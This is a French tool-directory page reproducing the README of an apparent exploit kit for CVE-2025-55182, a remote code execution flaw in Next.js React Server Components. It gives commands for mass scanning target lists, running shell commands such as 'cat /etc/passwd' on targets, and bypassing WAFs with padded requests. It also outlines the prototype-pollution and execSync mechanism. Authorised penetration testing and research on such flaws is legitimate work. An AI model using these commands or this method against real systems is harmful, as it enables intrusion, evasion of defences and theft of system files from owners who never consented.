Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC — Kit automatisé de détection et d'exploitation pour CVE-2025-55182, une RCE critique dans Next.js React Server Components. Dispose d'une empreinte multi-couche, d'un contournement WAF et d'un scan en masse pour les tests d'intrusion. | Kitploit
Outils/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
ReconnaissanceScanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebContournement de WAFTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

Kit automatisé de détection et d'exploitation pour CVE-2025-55182, une RCE critique dans Next.js React Server Components. Dispose d'une empreinte multi-couche, d'un contournement WAF et d'un scan en masse pour les tests d'intrusion.

Voir le dépôt
5il y a 9 moisPas encore vérifié
Partager

Outil d'exploitation de CVE-2025-55182

Un outil complet de recherche en sécurité pour tester la vulnérabilité d'exécution de code à distance des composants serveur React de Next.js (CVE-2025-55182).

Vue d'ensemble

Cette boîte à outils fournit des capacités de détection et d'exploitation automatisées pour CVE-2025-55182, une vulnérabilité RCE critique affectant les applications Next.js utilisant les composants serveur React. La boîte à outils se compose de trois composants intégrés :

  • NextApp.py - Scanner intelligent d'empreinte digitale des applications Next.js
  • exploit.sh - Outil d'exploitation flexible pour cibles uniques ou multiples
  • auto_exploit.sh - Orchestrateur automatisé de bout en bout pour la détection et l'exploitation

Fonctionnalités

  • Détection multicouche : Analyse des en-têtes, balayage du corps et empreinte JavaScript
  • Score de confiance : Classification intelligente (Élevée/Moyenne/Faible) pour minimiser les faux positifs
  • Contournement WAF : Techniques intégrées pour contourner les pare-feu d'applications web courants
  • Analyse groupée : Traitement efficace de plusieurs cibles avec des rapports détaillés
  • Flux de travail automatisé : Détection et exploitation en une seule commande
  • Rapports détaillés : Fichiers de sortie complets avec résultats catégorisés

Prérequis

Composants Python

  • Python 3.x
  • Bibliothèque requests
root@kitploit:~
pip3 install requests

Composants Bash

  • curl
  • openssl
  • Utilitaires Unix standards (sed, grep, awk, mktemp)

Installation

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

Utilisation

Démarrage rapide (recommandé)

Le moyen le plus rapide de scanner et d'exploiter des cibles :

root@kitploit:~
# Créez un fichier avec les URL cibles (une par ligne)
echo "https://example.com" > targets.txt

# Analyse et exploitation automatiques en une commande
./auto_exploit.sh -i targets.txt -s -c "id"

Détection uniquement

Identifier les applications Next.js sans exploitation :

root@kitploit:~
python3 NextApp.py targets.txt

Fichiers de sortie :

  • confirmed_nextjs_targets.txt - Toutes les applications Next.js détectées
  • high_confidence_nextjs_targets.txt - Détections à haute confiance uniquement

Exploitation d'une cible unique

Tester des cibles individuelles :

root@kitploit:~
# Exploitation de base
./exploit.sh -d https://target.com -c "whoami"

# Avec contournement WAF
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Taille personnalisée du contournement WAF
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Ignorer la vérification SSL
./exploit.sh -d https://target.com -c "id" -k

Exploitation groupée

Option 1 : Flux de travail unifié (recommandé)

root@kitploit:~
./auto_exploit.sh -i targets.txt -s -c "whoami"

Option 2 : Flux de travail manuel en deux étapes

root@kitploit:~
# Étape 1 : Détecter les applications Next.js
python3 NextApp.py targets.txt

# Étape 2 : Exploiter les cibles confirmées
./auto_exploit.sh -c "id"

Options avancées

root@kitploit:~
# Analyse automatique complète avec contournement WAF
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Délais et délais d'attente personnalisés
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Ignorer la vérification SSL en mode groupé
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

Référence des commandes

NextApp.py

root@kitploit:~
python3 NextApp.py <fichier_cibles>

Arguments :

  • fichier_cibles - Fichier texte contenant les URL cibles (une par ligne)

exploit.sh

root@kitploit:~
./exploit.sh [OPTIONS]

Options :

OptionDescriptionDéfaut
-d, --domainDomaine/URL ciblehttp://localhost:3000
-f, --fileFichier avec la liste des cibles-
-c, --commandCommande à exécuterid
-w, --waf-bypassActiver le contournement WAFDésactivé
--waf-size SIZETaille des données de contournement WAF (Ko)128
--timeout SECONDSDélai d'attente de la requête15
-k, --insecureIgnorer la vérification SSLDésactivé
--user-agent AGENTUser-Agent personnaliséMozilla/5.0...
-h, --helpAfficher le message d'aide-

auto_exploit.sh

root@kitploit:~
./auto_exploit.sh [OPTIONS]

Options :

OptionDescriptionDéfaut
-i, --input FILEFichier d'entrée des ciblesconfirmed_nextjs_targets.txt
-o, --output FILEFichier de sortie des résultatsexploit_results.txt
-c, --command CMDCommande à exécuterid
-w, --waf-bypassActiver le contournement WAFDésactivé
--waf-size SIZETaille du contournement WAF (Ko)128
--timeout SECONDSDélai d'attente de la requête15
-k, --insecureIgnorer la vérification SSLDésactivé
--delay SECONDSDélai entre les requêtes2
-s, --scanAnalyser automatiquement pour Next.js d'abordDésactivé
-h, --helpAfficher le message d'aide-

Fichiers de sortie

confirmed_nextjs_targets.txt

Généré par NextApp.py - contient toutes les URL identifiées comme des applications Next.js.

high_confidence_nextjs_targets.txt

Généré par NextApp.py - contient uniquement les détections Next.js à haute confiance (score de confiance 100+).

exploit_results.txt

Généré par auto_exploit.sh - rapport d'exploitation complet comprenant :

  • Cibles vulnérables avec sortie de commande
  • Cibles non vulnérables
  • Erreurs et leurs détails
  • Statistiques récapitulatives

Méthodologie de détection

Le scanner utilise plusieurs techniques de détection avec un système de notation de confiance :

Analyse des en-têtes (50 points chacun)

  • En-têtes spécifiques Next.js : x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • Serveur : Vercel

Balayage du corps

  • Présence de __NEXT_DATA__ (100 points)
  • Modèle buildId de Next.js (50 points)
  • Chemins d'actifs _next/* (25-75 points selon la quantité)

Empreinte JavaScript (60 points)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

Seuils de confiance :

  • Élevée (100+) : Plusieurs indicateurs forts
  • Moyenne (75-99) : Plusieurs indicateurs modérés
  • Faible (50-74) : Preuves minimes
  • En dessous de 50 : Rejeté comme faux positif

Mécanisme d'exploitation

L'exploit exploite une chaîne de pollution de prototype dans les composants serveur React de Next.js :

  1. Construit des données de formulaire multipart avec une charge utile imbriquée
  2. Pollue la chaîne __proto__ via la désérialisation JSON
  3. Injecte du JavaScript arbitraire dans _response._prefix
  4. Exécute des commandes via process.mainModule.require('child_process').execSync()
  5. Extrait les résultats de l'en-tête X-Action-Redirect
  6. Décode l'URL et formate la sortie

Techniques de contournement WAF

La boîte à outils inclut des capacités de contournement WAF intégrées :

  • Injection de données indésirables : Ajoute des données aléatoires pour contourner les filtres basés sur la taille
  • Limites dynamiques : Limites multipart aléatoires
  • Randomisation des ID de requête : ID uniques par requête
  • Taille configurable : Taille des données indésirables ajustable (défaut 128 Ko)

Activer avec les drapeaux -w ou --waf-bypass.

Exemples

Scanner et exploiter une application web

root@kitploit:~
# Créer la liste des cibles
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Lancer le scan unifié
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Consulter les résultats
cat exploit_results.txt

Tester une cible unique avec contournement WAF

root@kitploit:~
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

Cibles à haute confiance uniquement

root@kitploit:~
# Étape 1 : Détecter et filtrer
python3 NextApp.py targets.txt

# Étape 2 : Exploiter uniquement les cibles à haute confiance
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"

Avertissement légal

Cet outil est destiné uniquement à des fins de tests de sécurité et de recherche autorisés. Les utilisateurs doivent :

  • ✅ Obtenir une autorisation écrite explicite avant de tester tout système
  • ✅ L'utiliser uniquement dans le cadre d'engagements de tests d'intrusion autorisés
  • ✅ Se conformer à toutes les lois et réglementations applicables
  • ✅ L'utiliser pour la recherche en sécurité défensive et les compétitions CTF

L'accès non autorisé aux systèmes informatiques est illégal. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de cet outil.

Informations sur la vulnérabilité

  • ID CVE : CVE-2025-55182
  • Affecté : Composants serveur React de Next.js
  • Type : Exécution de code à distance (RCE)
  • Gravité : Critique

Crédits

Merci aux chercheurs en sécurité qui ont découvert et divulgué cette vulnérabilité :

  • @zack0x01
  • @infosec_au
  • @pdiscoveryio

Contribution

Les contributions sont les bienvenues ! Veuillez :

  1. Forker le dépôt
  2. Créer une branche de fonctionnalité
  3. Commiter vos modifications
  4. Soumettre une pull request

Support

Pour les problèmes, questions ou demandes de fonctionnalités, veuillez ouvrir un ticket sur GitHub.

Licence

Ce projet est fourni à des fins éducatives et de tests de sécurité autorisés. Utilisez-le de manière responsable et éthique.

Télécharger l’outil